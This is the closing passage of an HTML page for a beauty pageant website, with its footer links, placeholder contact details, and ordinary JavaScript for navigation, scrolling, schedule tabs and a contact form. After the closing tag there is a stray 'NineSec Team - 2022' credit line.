                        <a href="#"><i class="fab fa-youtube"></i></a>
                    </div>
                </div>
                
                <div class="footer-col">
                    <h3>Quick Links</h3>
                    <ul class="footer-links">
                        <li><a href="#home">Home</a></li>
                        <li><a href="#about">About</a></li>
                        <li><a href="#winners">Winners</a></li>
                        <li><a href="#gallery">Gallery</a></li>
                        <li><a href="#jury">Jury</a></li>
                        <li><a href="#schedule">Schedule</a></li>
                        <li><a href="#contact">Contact</a></li>
                    </ul>
                </div>
                
                <div class="footer-col">
                    <h3>Categories</h3>
                    <ul class="footer-links">
                        <li><a href="#">Miss India</a></li>
                        <li><a href="#">Mrs. India</a></li>
                        <li><a href="#">Classic Mrs. India</a></li>
                        <li><a href="#">Mrs. India Globe</a></li>
                        <li><a href="#">Miss Teen India</a></li>
                        <li><a href="#">Miss India Petite</a></li>
                    </ul>
                </div>
                
                <div class="footer-col">
                    <h3>Contact Info</h3>
                    <ul class="footer-links">
                        <li><i class="fas fa-map-marker-alt"></i> 123 Pageant Avenue, New Delhi</li>
                        <li><i class="fas fa-phone-alt"></i> +91 98765 43210</li>
                        <li><i class="fas fa-envelope"></i> info@tiskapageants.com</li>
                    </ul>
                </div>
            </div>
            
            <div class="footer-bottom">
                <p>&copy; 2025 Tiska Beauty Pageant. All Rights Reserved. | Designed by <a href="#" class="text-primary">Tiska Team</a></p>
            </div>
        </div>
    </footer>

    <!-- Back to Top Button -->
    <a href="#" class="back-to-top"><i class="fas fa-arrow-up"></i></a>

    <!-- JavaScript -->
    <script>
        // Mobile Navigation
        const hamburger = document.querySelector('.hamburger');
        const navLinks = document.querySelector('.nav-links');
        const links = document.querySelectorAll('.nav-links li');
        
        hamburger.addEventListener('click', () => {
            navLinks.classList.toggle('active');
            hamburger.classList.toggle('toggle');
            
            // Animate Links
            links.forEach((link, index) => {
                if (link.style.animation) {
                    link.style.animation = '';
                } else {
                    link.style.animation = `navLinkFade 0.5s ease forwards ${index / 7 + 0.3}s`;
                }
            });
        });
        
        // Sticky Header
        window.addEventListener('scroll', () => {
            const header = document.querySelector('header');
            header.classList.toggle('scrolled', window.scrollY > 0);
        });
        
        // Back to Top Button
        const backToTopButton = document.querySelector('.back-to-top');
        
        window.addEventListener('scroll', () => {
            if (window.pageYOffset > 300) {
                backToTopButton.classList.add('active');
            } else {
                backToTopButton.classList.remove('active');
            }
        });
        
        // Smooth Scrolling
        document.querySelectorAll('a[href^="#"]').forEach(anchor => {
            anchor.addEventListener('click', function(e) {
                e.preventDefault();
                
                document.querySelector(this.getAttribute('href')).scrollIntoView({
                    behavior: 'smooth'
                });
                
                // Close mobile menu when clicking a link
                if (navLinks.classList.contains('active')) {
                    navLinks.classList.remove('active');
                    hamburger.classList.remove('toggle');
                    links.forEach(link => {
                        link.style.animation = '';
                    });
                }
            });
        });
        
        // Tab System for Schedule
        const tabBtns = document.querySelectorAll('.tab-btn');
        const tabContents = document.querySelectorAll('.tab-content');
        
        tabBtns.forEach(btn => {
            btn.addEventListener('click', () => {
                const tabId = btn.getAttribute('data-tab');
                
                // Remove active class from all buttons and contents
                tabBtns.forEach(btn => btn.classList.remove('active'));
                tabContents.forEach(content => content.classList.remove('active'));
                
                // Add active class to clicked button and corresponding content
                btn.classList.add('active');
                document.getElementById(tabId).classList.add('active');
            });
        });
        
        // Form Submission
        const contactForm = document.getElementById('contactForm');
        
        contactForm.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Here you would typically send the form data to a server
            alert('Thank you for your message! We will get back to you soon.');
            this.reset();
        });
        
        // Animation on Scroll
        window.addEventListener('load', () => {
            AOS.init({
                duration: 1000,
                easing: 'ease-in-out',
                once: true
            });
        });
    </script>
</body>
</html>

NineSec Team - 2022